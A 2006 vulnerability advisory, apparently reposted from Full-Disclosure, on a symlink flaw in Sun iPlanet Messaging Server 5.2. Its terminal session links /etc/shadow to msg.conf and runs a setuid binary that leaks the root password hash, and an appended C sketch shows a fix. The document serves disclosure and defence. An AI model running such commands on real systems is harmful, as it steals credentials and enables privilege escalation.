[Full-disclosure] Sun iPlanet Messaging Server 5.2 root password compromise

2006-06-15T00:00:00
ID SECURITYVULNS:DOC:13204
Type securityvulns
Reporter Securityvulns
Modified 2006-06-15T00:00:00

Description

Summary

Date: 14 Jun 2006
Vendor: Sun Microsystems, Inc.
Name: iPlanet Messaging Server
Version: 5.2 HotFix 1.16 (built May 14 2003)
Vuln: msg.conf symlink attack
Severity: high

Software description

The iPlanet Messaging Server is a software product that provides a centralized location for the exchange of information through the sending and receiving of messages. The product is designed for telecommunications providers, service providers, and enterprises that offer messaging capabilities to employees, partners, and customers. The iPlanet Messaging Server delivers a Web-based messaging platform capable of serving tens of millions of users, and also provides value-added differentiated services, including outsourcing, wireless, and unified messaging services.

Vulnerability description

Setuid programs that are part of the iPlanet Messaging Server try to read the configuration file msg.conf. If the environment variable CONFIGROOT is set, the configuration is read from that directory. A symlink attack is therefore possible: the first line of any file can be read with uid=0, because the configuration parser prints the line it fails to parse in its error message.

Example

test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version
iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003)
SunOS sunbox 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris
test@sunbox:/tmp$
test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master
-rws--s--x 1 root mail 446864 Sep 22 2005 /iplanet/iMS5/bin/msg/imta/bin/pipe_master
test@sunbox:/tmp$
test@sunbox:/tmp$ ln -s /etc/shadow msg.conf
test@sunbox:/tmp$
test@sunbox:/tmp$ export CONFIGROOT=.
test@sunbox:/tmp$
test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master
[14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error: func=_configdrv_file_readoption; error=option name should be followed by '='; line=root:qW1HFEa1MCD0w:11821::::::
ERROR: Configuration database initialization failed - see default logfile
test@sunbox:/tmp$

Vulnerable

iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)

php0t / zorro.hu www.zorro.hu
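
A defensive sketch of the fix class for the issue described above, added here as an example (not code from Sun or from the advisory's author): a setuid program ignores CONFIGROOT when it runs elevated, and refuses a msg.conf that is a symlink, has an unexpected owner, or is writable by group or others. The function names and the /etc/example-app path are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* True when the process runs with more privilege than its invoker (setuid/setgid). */
int running_elevated(void) {
    return getuid() != geteuid() || getgid() != getegid();
}

/* Honour CONFIGROOT only for unprivileged runs; otherwise use the built-in path. */
const char *pick_config_root(int elevated, const char *builtin) {
    const char *env = getenv("CONFIGROOT");
    return (!elevated && env && *env) ? env : builtin;
}

/* Open <root>/msg.conf; returns an fd, or -1 if the file is not trustworthy. */
int open_config(const char *root, uid_t owner) {
    char path[PATH_MAX];
    struct stat st;
    if (snprintf(path, sizeof path, "%s/msg.conf", root) >= (int)sizeof path)
        return -1;
    /* O_NOFOLLOW refuses a symlink as the final component; O_NONBLOCK avoids hanging on a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    /* Check the opened descriptor, not the path, so the file cannot be swapped after the check. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void) {
    /* "/etc/example-app" is a placeholder for the compiled-in configuration directory. */
    const char *root = pick_config_root(running_elevated(), "/etc/example-app");
    int fd = open_config(root, 0);
    if (fd < 0) { fprintf(stderr, "refusing configuration under %s\n", root); return 1; }
    close(fd);
    return 0;
}
```

O_NOFOLLOW only covers the last path component, so ignoring the environment override while elevated is the primary control. Separately, the parser's error path should report the line number rather than echo the content of the line it rejected.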

